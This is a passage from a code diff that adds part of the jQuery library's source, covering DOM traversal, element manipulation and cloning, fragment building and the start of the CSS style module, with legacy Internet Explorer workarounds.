+		return sibling( elem, "previousSibling" );
+	},
+	nextAll: function( elem ) {
+		return jQuery.dir( elem, "nextSibling" );
+	},
+	prevAll: function( elem ) {
+		return jQuery.dir( elem, "previousSibling" );
+	},
+	nextUntil: function( elem, i, until ) {
+		return jQuery.dir( elem, "nextSibling", until );
+	},
+	prevUntil: function( elem, i, until ) {
+		return jQuery.dir( elem, "previousSibling", until );
+	},
+	siblings: function( elem ) {
+		return jQuery.sibling( ( elem.parentNode || {} ).firstChild, elem );
+	},
+	children: function( elem ) {
+		return jQuery.sibling( elem.firstChild );
+	},
+	contents: function( elem ) {
+		return jQuery.nodeName( elem, "iframe" ) ?
+			elem.contentDocument || elem.contentWindow.document :
+			jQuery.merge( [], elem.childNodes );
+	}
+}, function( name, fn ) {
+	jQuery.fn[ name ] = function( until, selector ) {
+		var ret = jQuery.map( this, fn, until );
+
+		if ( name.slice( -5 ) !== "Until" ) {
+			selector = until;
+		}
+
+		if ( selector && typeof selector === "string" ) {
+			ret = jQuery.filter( selector, ret );
+		}
+
+		if ( this.length > 1 ) {
+			// Remove duplicates
+			if ( !guaranteedUnique[ name ] ) {
+				ret = jQuery.unique( ret );
+			}
+
+			// Reverse order for parents* and prev-derivatives
+			if ( rparentsprev.test( name ) ) {
+				ret = ret.reverse();
+			}
+		}
+
+		return this.pushStack( ret );
+	};
+});
+
+jQuery.extend({
+	filter: function( expr, elems, not ) {
+		var elem = elems[ 0 ];
+
+		if ( not ) {
+			expr = ":not(" + expr + ")";
+		}
+
+		return elems.length === 1 && elem.nodeType === 1 ?
+			jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] :
+			jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) {
+				return elem.nodeType === 1;
+			}));
+	},
+
+	dir: function( elem, dir, until ) {
+		var matched = [],
+			cur = elem[ dir ];
+
+		while ( cur && cur.nodeType !== 9 && (until === undefined || cur.nodeType !== 1 || !jQuery( cur ).is( until )) ) {
+			if ( cur.nodeType === 1 ) {
+				matched.push( cur );
+			}
+			cur = cur[dir];
+		}
+		return matched;
+	},
+
+	sibling: function( n, elem ) {
+		var r = [];
+
+		for ( ; n; n = n.nextSibling ) {
+			if ( n.nodeType === 1 && n !== elem ) {
+				r.push( n );
+			}
+		}
+
+		return r;
+	}
+});
+
+// Implement the identical functionality for filter and not
+function winnow( elements, qualifier, not ) {
+	if ( jQuery.isFunction( qualifier ) ) {
+		return jQuery.grep( elements, function( elem, i ) {
+			/* jshint -W018 */
+			return !!qualifier.call( elem, i, elem ) !== not;
+		});
+
+	}
+
+	if ( qualifier.nodeType ) {
+		return jQuery.grep( elements, function( elem ) {
+			return ( elem === qualifier ) !== not;
+		});
+
+	}
+
+	if ( typeof qualifier === "string" ) {
+		if ( isSimple.test( qualifier ) ) {
+			return jQuery.filter( qualifier, elements, not );
+		}
+
+		qualifier = jQuery.filter( qualifier, elements );
+	}
+
+	return jQuery.grep( elements, function( elem ) {
+		return ( jQuery.inArray( elem, qualifier ) >= 0 ) !== not;
+	});
+}
+function createSafeFragment( document ) {
+	var list = nodeNames.split( "|" ),
+		safeFrag = document.createDocumentFragment();
+
+	if ( safeFrag.createElement ) {
+		while ( list.length ) {
+			safeFrag.createElement(
+				list.pop()
+			);
+		}
+	}
+	return safeFrag;
+}
+
+var nodeNames = "abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|" +
+		"header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",
+	rinlinejQuery = / jQuery\d+="(?:null|\d+)"/g,
+	rnoshimcache = new RegExp("<(?:" + nodeNames + ")[\\s/>]", "i"),
+	rleadingWhitespace = /^\s+/,
+	rxhtmlTag = /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,
+	rtagName = /<([\w:]+)/,
+	rtbody = /<tbody/i,
+	rhtml = /<|&#?\w+;/,
+	rnoInnerhtml = /<(?:script|style|link)/i,
+	manipulation_rcheckableType = /^(?:checkbox|radio)$/i,
+	// checked="checked" or checked
+	rchecked = /checked\s*(?:[^=]|=\s*.checked.)/i,
+	rscriptType = /^$|\/(?:java|ecma)script/i,
+	rscriptTypeMasked = /^true\/(.*)/,
+	rcleanScript = /^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,
+
+	// We have to close these tags to support XHTML (#13200)
+	wrapMap = {
+		option: [ 1, "<select multiple='multiple'>", "</select>" ],
+		legend: [ 1, "<fieldset>", "</fieldset>" ],
+		area: [ 1, "<map>", "</map>" ],
+		param: [ 1, "<object>", "</object>" ],
+		thead: [ 1, "<table>", "</table>" ],
+		tr: [ 2, "<table><tbody>", "</tbody></table>" ],
+		col: [ 2, "<table><tbody></tbody><colgroup>", "</colgroup></table>" ],
+		td: [ 3, "<table><tbody><tr>", "</tr></tbody></table>" ],
+
+		// IE6-8 can't serialize link, script, style, or any html5 (NoScope) tags,
+		// unless wrapped in a div with non-breaking characters in front of it.
+		_default: jQuery.support.htmlSerialize ? [ 0, "", "" ] : [ 1, "X<div>", "</div>"  ]
+	},
+	safeFragment = createSafeFragment( document ),
+	fragmentDiv = safeFragment.appendChild( document.createElement("div") );
+
+wrapMap.optgroup = wrapMap.option;
+wrapMap.tbody = wrapMap.tfoot = wrapMap.colgroup = wrapMap.caption = wrapMap.thead;
+wrapMap.th = wrapMap.td;
+
+jQuery.fn.extend({
+	text: function( value ) {
+		return jQuery.access( this, function( value ) {
+			return value === undefined ?
+				jQuery.text( this ) :
+				this.empty().append( ( this[0] && this[0].ownerDocument || document ).createTextNode( value ) );
+		}, null, value, arguments.length );
+	},
+
+	append: function() {
+		return this.domManip( arguments, function( elem ) {
+			if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) {
+				var target = manipulationTarget( this, elem );
+				target.appendChild( elem );
+			}
+		});
+	},
+
+	prepend: function() {
+		return this.domManip( arguments, function( elem ) {
+			if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) {
+				var target = manipulationTarget( this, elem );
+				target.insertBefore( elem, target.firstChild );
+			}
+		});
+	},
+
+	before: function() {
+		return this.domManip( arguments, function( elem ) {
+			if ( this.parentNode ) {
+				this.parentNode.insertBefore( elem, this );
+			}
+		});
+	},
+
+	after: function() {
+		return this.domManip( arguments, function( elem ) {
+			if ( this.parentNode ) {
+				this.parentNode.insertBefore( elem, this.nextSibling );
+			}
+		});
+	},
+
+	// keepData is for internal use only--do not document
+	remove: function( selector, keepData ) {
+		var elem,
+			elems = selector ? jQuery.filter( selector, this ) : this,
+			i = 0;
+
+		for ( ; (elem = elems[i]) != null; i++ ) {
+
+			if ( !keepData && elem.nodeType === 1 ) {
+				jQuery.cleanData( getAll( elem ) );
+			}
+
+			if ( elem.parentNode ) {
+				if ( keepData && jQuery.contains( elem.ownerDocument, elem ) ) {
+					setGlobalEval( getAll( elem, "script" ) );
+				}
+				elem.parentNode.removeChild( elem );
+			}
+		}
+
+		return this;
+	},
+
+	empty: function() {
+		var elem,
+			i = 0;
+
+		for ( ; (elem = this[i]) != null; i++ ) {
+			// Remove element nodes and prevent memory leaks
+			if ( elem.nodeType === 1 ) {
+				jQuery.cleanData( getAll( elem, false ) );
+			}
+
+			// Remove any remaining nodes
+			while ( elem.firstChild ) {
+				elem.removeChild( elem.firstChild );
+			}
+
+			// If this is a select, ensure that it displays empty (#12336)
+			// Support: IE<9
+			if ( elem.options && jQuery.nodeName( elem, "select" ) ) {
+				elem.options.length = 0;
+			}
+		}
+
+		return this;
+	},
+
+	clone: function( dataAndEvents, deepDataAndEvents ) {
+		dataAndEvents = dataAndEvents == null ? false : dataAndEvents;
+		deepDataAndEvents = deepDataAndEvents == null ? dataAndEvents : deepDataAndEvents;
+
+		return this.map( function () {
+			return jQuery.clone( this, dataAndEvents, deepDataAndEvents );
+		});
+	},
+
+	html: function( value ) {
+		return jQuery.access( this, function( value ) {
+			var elem = this[0] || {},
+				i = 0,
+				l = this.length;
+
+			if ( value === undefined ) {
+				return elem.nodeType === 1 ?
+					elem.innerHTML.replace( rinlinejQuery, "" ) :
+					undefined;
+			}
+
+			// See if we can take a shortcut and just use innerHTML
+			if ( typeof value === "string" && !rnoInnerhtml.test( value ) &&
+				( jQuery.support.htmlSerialize || !rnoshimcache.test( value )  ) &&
+				( jQuery.support.leadingWhitespace || !rleadingWhitespace.test( value ) ) &&
+				!wrapMap[ ( rtagName.exec( value ) || ["", ""] )[1].toLowerCase() ] ) {
+
+				value = value.replace( rxhtmlTag, "<$1></$2>" );
+
+				try {
+					for (; i < l; i++ ) {
+						// Remove element nodes and prevent memory leaks
+						elem = this[i] || {};
+						if ( elem.nodeType === 1 ) {
+							jQuery.cleanData( getAll( elem, false ) );
+							elem.innerHTML = value;
+						}
+					}
+
+					elem = 0;
+
+				// If using innerHTML throws an exception, use the fallback method
+				} catch(e) {}
+			}
+
+			if ( elem ) {
+				this.empty().append( value );
+			}
+		}, null, value, arguments.length );
+	},
+
+	replaceWith: function() {
+		var
+			// Snapshot the DOM in case .domManip sweeps something relevant into its fragment
+			args = jQuery.map( this, function( elem ) {
+				return [ elem.nextSibling, elem.parentNode ];
+			}),
+			i = 0;
+
+		// Make the changes, replacing each context element with the new content
+		this.domManip( arguments, function( elem ) {
+			var next = args[ i++ ],
+				parent = args[ i++ ];
+
+			if ( parent ) {
+				// Don't use the snapshot next if it has moved (#13810)
+				if ( next && next.parentNode !== parent ) {
+					next = this.nextSibling;
+				}
+				jQuery( this ).remove();
+				parent.insertBefore( elem, next );
+			}
+		// Allow new content to include elements from the context set
+		}, true );
+
+		// Force removal if there was no new content (e.g., from empty arguments)
+		return i ? this : this.remove();
+	},
+
+	detach: function( selector ) {
+		return this.remove( selector, true );
+	},
+
+	domManip: function( args, callback, allowIntersection ) {
+
+		// Flatten any nested arrays
+		args = core_concat.apply( [], args );
+
+		var first, node, hasScripts,
+			scripts, doc, fragment,
+			i = 0,
+			l = this.length,
+			set = this,
+			iNoClone = l - 1,
+			value = args[0],
+			isFunction = jQuery.isFunction( value );
+
+		// We can't cloneNode fragments that contain checked, in WebKit
+		if ( isFunction || !( l <= 1 || typeof value !== "string" || jQuery.support.checkClone || !rchecked.test( value ) ) ) {
+			return this.each(function( index ) {
+				var self = set.eq( index );
+				if ( isFunction ) {
+					args[0] = value.call( this, index, self.html() );
+				}
+				self.domManip( args, callback, allowIntersection );
+			});
+		}
+
+		if ( l ) {
+			fragment = jQuery.buildFragment( args, this[ 0 ].ownerDocument, false, !allowIntersection && this );
+			first = fragment.firstChild;
+
+			if ( fragment.childNodes.length === 1 ) {
+				fragment = first;
+			}
+
+			if ( first ) {
+				scripts = jQuery.map( getAll( fragment, "script" ), disableScript );
+				hasScripts = scripts.length;
+
+				// Use the original fragment for the last item instead of the first because it can end up
+				// being emptied incorrectly in certain situations (#8070).
+				for ( ; i < l; i++ ) {
+					node = fragment;
+
+					if ( i !== iNoClone ) {
+						node = jQuery.clone( node, true, true );
+
+						// Keep references to cloned scripts for later restoration
+						if ( hasScripts ) {
+							jQuery.merge( scripts, getAll( node, "script" ) );
+						}
+					}
+
+					callback.call( this[i], node, i );
+				}
+
+				if ( hasScripts ) {
+					doc = scripts[ scripts.length - 1 ].ownerDocument;
+
+					// Reenable scripts
+					jQuery.map( scripts, restoreScript );
+
+					// Evaluate executable scripts on first document insertion
+					for ( i = 0; i < hasScripts; i++ ) {
+						node = scripts[ i ];
+						if ( rscriptType.test( node.type || "" ) &&
+							!jQuery._data( node, "globalEval" ) && jQuery.contains( doc, node ) ) {
+
+							if ( node.src ) {
+								// Hope ajax is available...
+								jQuery._evalUrl( node.src );
+							} else {
+								jQuery.globalEval( ( node.text || node.textContent || node.innerHTML || "" ).replace( rcleanScript, "" ) );
+							}
+						}
+					}
+				}
+
+				// Fix #11809: Avoid leaking memory
+				fragment = first = null;
+			}
+		}
+
+		return this;
+	}
+});
+
+// Support: IE<8
+// Manipulating tables requires a tbody
+function manipulationTarget( elem, content ) {
+	return jQuery.nodeName( elem, "table" ) &&
+		jQuery.nodeName( content.nodeType === 1 ? content : content.firstChild, "tr" ) ?
+
+		elem.getElementsByTagName("tbody")[0] ||
+			elem.appendChild( elem.ownerDocument.createElement("tbody") ) :
+		elem;
+}
+
+// Replace/restore the type attribute of script elements for safe DOM manipulation
+function disableScript( elem ) {
+	elem.type = (jQuery.find.attr( elem, "type" ) !== null) + "/" + elem.type;
+	return elem;
+}
+function restoreScript( elem ) {
+	var match = rscriptTypeMasked.exec( elem.type );
+	if ( match ) {
+		elem.type = match[1];
+	} else {
+		elem.removeAttribute("type");
+	}
+	return elem;
+}
+
+// Mark scripts as having already been evaluated
+function setGlobalEval( elems, refElements ) {
+	var elem,
+		i = 0;
+	for ( ; (elem = elems[i]) != null; i++ ) {
+		jQuery._data( elem, "globalEval", !refElements || jQuery._data( refElements[i], "globalEval" ) );
+	}
+}
+
+function cloneCopyEvent( src, dest ) {
+
+	if ( dest.nodeType !== 1 || !jQuery.hasData( src ) ) {
+		return;
+	}
+
+	var type, i, l,
+		oldData = jQuery._data( src ),
+		curData = jQuery._data( dest, oldData ),
+		events = oldData.events;
+
+	if ( events ) {
+		delete curData.handle;
+		curData.events = {};
+
+		for ( type in events ) {
+			for ( i = 0, l = events[ type ].length; i < l; i++ ) {
+				jQuery.event.add( dest, type, events[ type ][ i ] );
+			}
+		}
+	}
+
+	// make the cloned public data object a copy from the original
+	if ( curData.data ) {
+		curData.data = jQuery.extend( {}, curData.data );
+	}
+}
+
+function fixCloneNodeIssues( src, dest ) {
+	var nodeName, e, data;
+
+	// We do not need to do anything for non-Elements
+	if ( dest.nodeType !== 1 ) {
+		return;
+	}
+
+	nodeName = dest.nodeName.toLowerCase();
+
+	// IE6-8 copies events bound via attachEvent when using cloneNode.
+	if ( !jQuery.support.noCloneEvent && dest[ jQuery.expando ] ) {
+		data = jQuery._data( dest );
+
+		for ( e in data.events ) {
+			jQuery.removeEvent( dest, e, data.handle );
+		}
+
+		// Event data gets referenced instead of copied if the expando gets copied too
+		dest.removeAttribute( jQuery.expando );
+	}
+
+	// IE blanks contents when cloning scripts, and tries to evaluate newly-set text
+	if ( nodeName === "script" && dest.text !== src.text ) {
+		disableScript( dest ).text = src.text;
+		restoreScript( dest );
+
+	// IE6-10 improperly clones children of object elements using classid.
+	// IE10 throws NoModificationAllowedError if parent is null, #12132.
+	} else if ( nodeName === "object" ) {
+		if ( dest.parentNode ) {
+			dest.outerHTML = src.outerHTML;
+		}
+
+		// This path appears unavoidable for IE9. When cloning an object
+		// element in IE9, the outerHTML strategy above is not sufficient.
+		// If the src has innerHTML and the destination does not,
+		// copy the src.innerHTML into the dest.innerHTML. #10324
+		if ( jQuery.support.html5Clone && ( src.innerHTML && !jQuery.trim(dest.innerHTML) ) ) {
+			dest.innerHTML = src.innerHTML;
+		}
+
+	} else if ( nodeName === "input" && manipulation_rcheckableType.test( src.type ) ) {
+		// IE6-8 fails to persist the checked state of a cloned checkbox
+		// or radio button. Worse, IE6-7 fail to give the cloned element
+		// a checked appearance if the defaultChecked value isn't also set
+
+		dest.defaultChecked = dest.checked = src.checked;
+
+		// IE6-7 get confused and end up setting the value of a cloned
+		// checkbox/radio button to an empty string instead of "on"
+		if ( dest.value !== src.value ) {
+			dest.value = src.value;
+		}
+
+	// IE6-8 fails to return the selected option to the default selected
+	// state when cloning options
+	} else if ( nodeName === "option" ) {
+		dest.defaultSelected = dest.selected = src.defaultSelected;
+
+	// IE6-8 fails to set the defaultValue to the correct value when
+	// cloning other types of input fields
+	} else if ( nodeName === "input" || nodeName === "textarea" ) {
+		dest.defaultValue = src.defaultValue;
+	}
+}
+
+jQuery.each({
+	appendTo: "append",
+	prependTo: "prepend",
+	insertBefore: "before",
+	insertAfter: "after",
+	replaceAll: "replaceWith"
+}, function( name, original ) {
+	jQuery.fn[ name ] = function( selector ) {
+		var elems,
+			i = 0,
+			ret = [],
+			insert = jQuery( selector ),
+			last = insert.length - 1;
+
+		for ( ; i <= last; i++ ) {
+			elems = i === last ? this : this.clone(true);
+			jQuery( insert[i] )[ original ]( elems );
+
+			// Modern browsers can apply jQuery collections as arrays, but oldIE needs a .get()
+			core_push.apply( ret, elems.get() );
+		}
+
+		return this.pushStack( ret );
+	};
+});
+
+function getAll( context, tag ) {
+	var elems, elem,
+		i = 0,
+		found = typeof context.getElementsByTagName !== core_strundefined ? context.getElementsByTagName( tag || "*" ) :
+			typeof context.querySelectorAll !== core_strundefined ? context.querySelectorAll( tag || "*" ) :
+			undefined;
+
+	if ( !found ) {
+		for ( found = [], elems = context.childNodes || context; (elem = elems[i]) != null; i++ ) {
+			if ( !tag || jQuery.nodeName( elem, tag ) ) {
+				found.push( elem );
+			} else {
+				jQuery.merge( found, getAll( elem, tag ) );
+			}
+		}
+	}
+
+	return tag === undefined || tag && jQuery.nodeName( context, tag ) ?
+		jQuery.merge( [ context ], found ) :
+		found;
+}
+
+// Used in buildFragment, fixes the defaultChecked property
+function fixDefaultChecked( elem ) {
+	if ( manipulation_rcheckableType.test( elem.type ) ) {
+		elem.defaultChecked = elem.checked;
+	}
+}
+
+jQuery.extend({
+	clone: function( elem, dataAndEvents, deepDataAndEvents ) {
+		var destElements, node, clone, i, srcElements,
+			inPage = jQuery.contains( elem.ownerDocument, elem );
+
+		if ( jQuery.support.html5Clone || jQuery.isXMLDoc(elem) || !rnoshimcache.test( "<" + elem.nodeName + ">" ) ) {
+			clone = elem.cloneNode( true );
+
+		// IE<=8 does not properly clone detached, unknown element nodes
+		} else {
+			fragmentDiv.innerHTML = elem.outerHTML;
+			fragmentDiv.removeChild( clone = fragmentDiv.firstChild );
+		}
+
+		if ( (!jQuery.support.noCloneEvent || !jQuery.support.noCloneChecked) &&
+				(elem.nodeType === 1 || elem.nodeType === 11) && !jQuery.isXMLDoc(elem) ) {
+
+			// We eschew Sizzle here for performance reasons: http://jsperf.com/getall-vs-sizzle/2
+			destElements = getAll( clone );
+			srcElements = getAll( elem );
+
+			// Fix all IE cloning issues
+			for ( i = 0; (node = srcElements[i]) != null; ++i ) {
+				// Ensure that the destination node is not null; Fixes #9587
+				if ( destElements[i] ) {
+					fixCloneNodeIssues( node, destElements[i] );
+				}
+			}
+		}
+
+		// Copy the events from the original to the clone
+		if ( dataAndEvents ) {
+			if ( deepDataAndEvents ) {
+				srcElements = srcElements || getAll( elem );
+				destElements = destElements || getAll( clone );
+
+				for ( i = 0; (node = srcElements[i]) != null; i++ ) {
+					cloneCopyEvent( node, destElements[i] );
+				}
+			} else {
+				cloneCopyEvent( elem, clone );
+			}
+		}
+
+		// Preserve script evaluation history
+		destElements = getAll( clone, "script" );
+		if ( destElements.length > 0 ) {
+			setGlobalEval( destElements, !inPage && getAll( elem, "script" ) );
+		}
+
+		destElements = srcElements = node = null;
+
+		// Return the cloned set
+		return clone;
+	},
+
+	buildFragment: function( elems, context, scripts, selection ) {
+		var j, elem, contains,
+			tmp, tag, tbody, wrap,
+			l = elems.length,
+
+			// Ensure a safe fragment
+			safe = createSafeFragment( context ),
+
+			nodes = [],
+			i = 0;
+
+		for ( ; i < l; i++ ) {
+			elem = elems[ i ];
+
+			if ( elem || elem === 0 ) {
+
+				// Add nodes directly
+				if ( jQuery.type( elem ) === "object" ) {
+					jQuery.merge( nodes, elem.nodeType ? [ elem ] : elem );
+
+				// Convert non-html into a text node
+				} else if ( !rhtml.test( elem ) ) {
+					nodes.push( context.createTextNode( elem ) );
+
+				// Convert html into DOM nodes
+				} else {
+					tmp = tmp || safe.appendChild( context.createElement("div") );
+
+					// Deserialize a standard representation
+					tag = ( rtagName.exec( elem ) || ["", ""] )[1].toLowerCase();
+					wrap = wrapMap[ tag ] || wrapMap._default;
+
+					tmp.innerHTML = wrap[1] + elem.replace( rxhtmlTag, "<$1></$2>" ) + wrap[2];
+
+					// Descend through wrappers to the right content
+					j = wrap[0];
+					while ( j-- ) {
+						tmp = tmp.lastChild;
+					}
+
+					// Manually add leading whitespace removed by IE
+					if ( !jQuery.support.leadingWhitespace && rleadingWhitespace.test( elem ) ) {
+						nodes.push( context.createTextNode( rleadingWhitespace.exec( elem )[0] ) );
+					}
+
+					// Remove IE's autoinserted <tbody> from table fragments
+					if ( !jQuery.support.tbody ) {
+
+						// String was a <table>, *may* have spurious <tbody>
+						elem = tag === "table" && !rtbody.test( elem ) ?
+							tmp.firstChild :
+
+							// String was a bare <thead> or <tfoot>
+							wrap[1] === "<table>" && !rtbody.test( elem ) ?
+								tmp :
+								0;
+
+						j = elem && elem.childNodes.length;
+						while ( j-- ) {
+							if ( jQuery.nodeName( (tbody = elem.childNodes[j]), "tbody" ) && !tbody.childNodes.length ) {
+								elem.removeChild( tbody );
+							}
+						}
+					}
+
+					jQuery.merge( nodes, tmp.childNodes );
+
+					// Fix #12392 for WebKit and IE > 9
+					tmp.textContent = "";
+
+					// Fix #12392 for oldIE
+					while ( tmp.firstChild ) {
+						tmp.removeChild( tmp.firstChild );
+					}
+
+					// Remember the top-level container for proper cleanup
+					tmp = safe.lastChild;
+				}
+			}
+		}
+
+		// Fix #11356: Clear elements from fragment
+		if ( tmp ) {
+			safe.removeChild( tmp );
+		}
+
+		// Reset defaultChecked for any radios and checkboxes
+		// about to be appended to the DOM in IE 6/7 (#8060)
+		if ( !jQuery.support.appendChecked ) {
+			jQuery.grep( getAll( nodes, "input" ), fixDefaultChecked );
+		}
+
+		i = 0;
+		while ( (elem = nodes[ i++ ]) ) {
+
+			// #4087 - If origin and destination elements are the same, and this is
+			// that element, do not do anything
+			if ( selection && jQuery.inArray( elem, selection ) !== -1 ) {
+				continue;
+			}
+
+			contains = jQuery.contains( elem.ownerDocument, elem );
+
+			// Append to fragment
+			tmp = getAll( safe.appendChild( elem ), "script" );
+
+			// Preserve script evaluation history
+			if ( contains ) {
+				setGlobalEval( tmp );
+			}
+
+			// Capture executables
+			if ( scripts ) {
+				j = 0;
+				while ( (elem = tmp[ j++ ]) ) {
+					if ( rscriptType.test( elem.type || "" ) ) {
+						scripts.push( elem );
+					}
+				}
+			}
+		}
+
+		tmp = null;
+
+		return safe;
+	},
+
+	cleanData: function( elems, /* internal */ acceptData ) {
+		var elem, type, id, data,
+			i = 0,
+			internalKey = jQuery.expando,
+			cache = jQuery.cache,
+			deleteExpando = jQuery.support.deleteExpando,
+			special = jQuery.event.special;
+
+		for ( ; (elem = elems[i]) != null; i++ ) {
+
+			if ( acceptData || jQuery.acceptData( elem ) ) {
+
+				id = elem[ internalKey ];
+				data = id && cache[ id ];
+
+				if ( data ) {
+					if ( data.events ) {
+						for ( type in data.events ) {
+							if ( special[ type ] ) {
+								jQuery.event.remove( elem, type );
+
+							// This is a shortcut to avoid jQuery.event.remove's overhead
+							} else {
+								jQuery.removeEvent( elem, type, data.handle );
+							}
+						}
+					}
+
+					// Remove cache only if it was not already removed by jQuery.event.remove
+					if ( cache[ id ] ) {
+
+						delete cache[ id ];
+
+						// IE does not allow us to delete expando properties from nodes,
+						// nor does it have a removeAttribute function on Document nodes;
+						// we must handle all of these cases
+						if ( deleteExpando ) {
+							delete elem[ internalKey ];
+
+						} else if ( typeof elem.removeAttribute !== core_strundefined ) {
+							elem.removeAttribute( internalKey );
+
+						} else {
+							elem[ internalKey ] = null;
+						}
+
+						core_deletedIds.push( id );
+					}
+				}
+			}
+		}
+	},
+
+	_evalUrl: function( url ) {
+		return jQuery.ajax({
+			url: url,
+			type: "GET",
+			dataType: "script",
+			async: false,
+			global: false,
+			"throws": true
+		});
+	}
+});
+jQuery.fn.extend({
+	wrapAll: function( html ) {
+		if ( jQuery.isFunction( html ) ) {
+			return this.each(function(i) {
+				jQuery(this).wrapAll( html.call(this, i) );
+			});
+		}
+
+		if ( this[0] ) {
+			// The elements to wrap the target around
+			var wrap = jQuery( html, this[0].ownerDocument ).eq(0).clone(true);
+
+			if ( this[0].parentNode ) {
+				wrap.insertBefore( this[0] );
+			}
+
+			wrap.map(function() {
+				var elem = this;
+
+				while ( elem.firstChild && elem.firstChild.nodeType === 1 ) {
+					elem = elem.firstChild;
+				}
+
+				return elem;
+			}).append( this );
+		}
+
+		return this;
+	},
+
+	wrapInner: function( html ) {
+		if ( jQuery.isFunction( html ) ) {
+			return this.each(function(i) {
+				jQuery(this).wrapInner( html.call(this, i) );
+			});
+		}
+
+		return this.each(function() {
+			var self = jQuery( this ),
+				contents = self.contents();
+
+			if ( contents.length ) {
+				contents.wrapAll( html );
+
+			} else {
+				self.append( html );
+			}
+		});
+	},
+
+	wrap: function( html ) {
+		var isFunction = jQuery.isFunction( html );
+
+		return this.each(function(i) {
+			jQuery( this ).wrapAll( isFunction ? html.call(this, i) : html );
+		});
+	},
+
+	unwrap: function() {
+		return this.parent().each(function() {
+			if ( !jQuery.nodeName( this, "body" ) ) {
+				jQuery( this ).replaceWith( this.childNodes );
+			}
+		}).end();
+	}
+});
+var iframe, getStyles, curCSS,
+	ralpha = /alpha\([^)]*\)/i,
+	ropacity = /opacity\s*=\s*([^)]*)/,
+	rposition = /^(top|right|bottom|left)$/,
+	// swappable if display is none or starts with table except "table", "table-cell", or "table-caption"
+	// see here for display values: https://developer.mozilla.org/en-US/docs/CSS/display
+	rdisplayswap = /^(none|table(?!-c[ea]).+)/,
+	rmargin = /^margin/,
+	rnumsplit = new RegExp( "^(" + core_pnum + ")(.*)$", "i" ),
+	rnumnonpx = new RegExp( "^(" + core_pnum + ")(?!px)[a-z%]+$", "i" ),
+	rrelNum = new RegExp( "^([+-])=(" + core_pnum + ")", "i" ),
+	elemdisplay = { BODY: "block" },
+
+	cssShow = { position: "absolute", visibility: "hidden", display: "block" },
+	cssNormalTransform = {
+		letterSpacing: 0,
+		fontWeight: 400
+	},
+
+	cssExpand = [ "Top", "Right", "Bottom", "Left" ],
+	cssPrefixes = [ "Webkit", "O", "Moz", "ms" ];
+
+// return a css property mapped to a potentially vendor prefixed property
+function vendorPropName( style, name ) {
+
+	// shortcut for names that are not vendor prefixed
+	if ( name in style ) {
+		return name;
+	}
+
+	// check for vendor prefixed names
+	var capName = name.charAt(0).toUpperCase() + name.slice(1),
+		origName = name,
+		i = cssPrefixes.length;
+
+	while ( i-- ) {
+		name = cssPrefixes[ i ] + capName;
+		if ( name in style ) {
+			return name;
+		}
+	}
+
+	return origName;
+}
+
+function isHidden( elem, el ) {
+	// isHidden might be called from jQuery#filter function;
+	// in that case, element will be second argument
+	elem = el || elem;
+	return jQuery.css( elem, "display" ) === "none" || !jQuery.contains( elem.ownerDocument, elem );
+}
+
+function showHide( elements, show ) {
+	var display, elem, hidden,
+		values = [],
+		index = 0,
+		length = elements.length;
+
+	for ( ; index < length; index++ ) {
+		elem = elements[ index ];
+		if ( !elem.style ) {
+			continue;
+		}
+
+		values[ index ] = jQuery._data( elem, "olddisplay" );
+		display = elem.style.display;
+		if ( show ) {
+			// Reset the inline display of this element to learn if it is
+			// being hidden by cascaded rules or not
+			if ( !values[ index ] && display === "none" ) {
+				elem.style.display = "";
+			}
+
+			// Set elements which have been overridden with display: none
+			// in a stylesheet to whatever the default browser style is
+			// for such an element
+			if ( elem.style.display === "" && isHidden( elem ) ) {
+				values[ index ] = jQuery._data( elem, "olddisplay", css_defaultDisplay(elem.nodeName) );
+			}
+		} else {
+
+			if ( !values[ index ] ) {
+				hidden = isHidden( elem );
+
+				if ( display && display !== "none" || !hidden ) {
+					jQuery._data( elem, "olddisplay", hidden ? display : jQuery.css( elem, "display" ) );
+				}
+			}
+		}
+	}
+
+	// Set the display of most of the elements in a second loop
+	// to avoid the constant reflow
+	for ( index = 0; index < length; index++ ) {
+		elem = elements[ index ];
+		if ( !elem.style ) {
+			continue;
+		}
+		if ( !show || elem.style.display === "none" || elem.style.display === "" ) {
+			elem.style.display = show ? values[ index ] || "" : "none";
+		}
+	}
+
+	return elements;
+}
+
+jQuery.fn.extend({
+	css: function( name, value ) {
+		return jQuery.access( this, function( elem, name, value ) {
+			var len, styles,
+				map = {},
+				i = 0;
+
+			if ( jQuery.isArray( name ) ) {
+				styles = getStyles( elem );
+				len = name.length;
+
+				for ( ; i < len; i++ ) {
+					map[ name[ i ] ] = jQuery.css( elem, name[ i ], false, styles );
+				}
+
+				return map;
+			}
+
+			return value !== undefined ?
+				jQuery.style( elem, name, value ) :
+				jQuery.css( elem, name );
+		}, name, value, arguments.length > 1 );
+	},
+	show: function() {
+		return showHide( this, true );
+	},
+	hide: function() {
+		return showHide( this );
+	},
+	toggle: function( state ) {
+		if ( typeof state === "boolean" ) {
+			return state ? this.show() : this.hide();
+		}
+
+		return this.each(function() {
+			if ( isHidden( this ) ) {
+				jQuery( this ).show();
+			} else {
+				jQuery( this ).hide();
+			}
+		});
+	}
+});
+
+jQuery.extend({
+	// Add in style property hooks for overriding the default
+	// behavior of getting and setting a style property
+	cssHooks: {
+		opacity: {
+			get: function( elem, computed ) {
+				if ( computed ) {
+					// We should always get a number back from opacity
+					var ret = curCSS( elem, "opacity" );
+					return ret === "" ? "1" : ret;
+				}
+			}
+		}
+	},
+
+	// Don't automatically add "px" to these possibly-unitless properties
+	cssNumber: {
+		"columnCount": true,
+		"fillOpacity": true,
+		"fontWeight": true,
+		"lineHeight": true,
+		"opacity": true,
+		"order": true,
+		"orphans": true,
+		"widows": true,
+		"zIndex": true,
+		"zoom": true
+	},
+
+	// Add in properties whose names you wish to fix before
+	// setting or getting the value
+	cssProps: {
+		// normalize float css property
+		"float": jQuery.support.cssFloat ? "cssFloat" : "styleFloat"
+	},
+
+	// Get and set the style property on a DOM Node
+	style: function( elem, name, value, extra ) {
+		// Don't set styles on text and comment nodes
+		if ( !elem || elem.nodeType === 3 || elem.nodeType === 8 || !elem.style ) {
+			return;
+		}
+
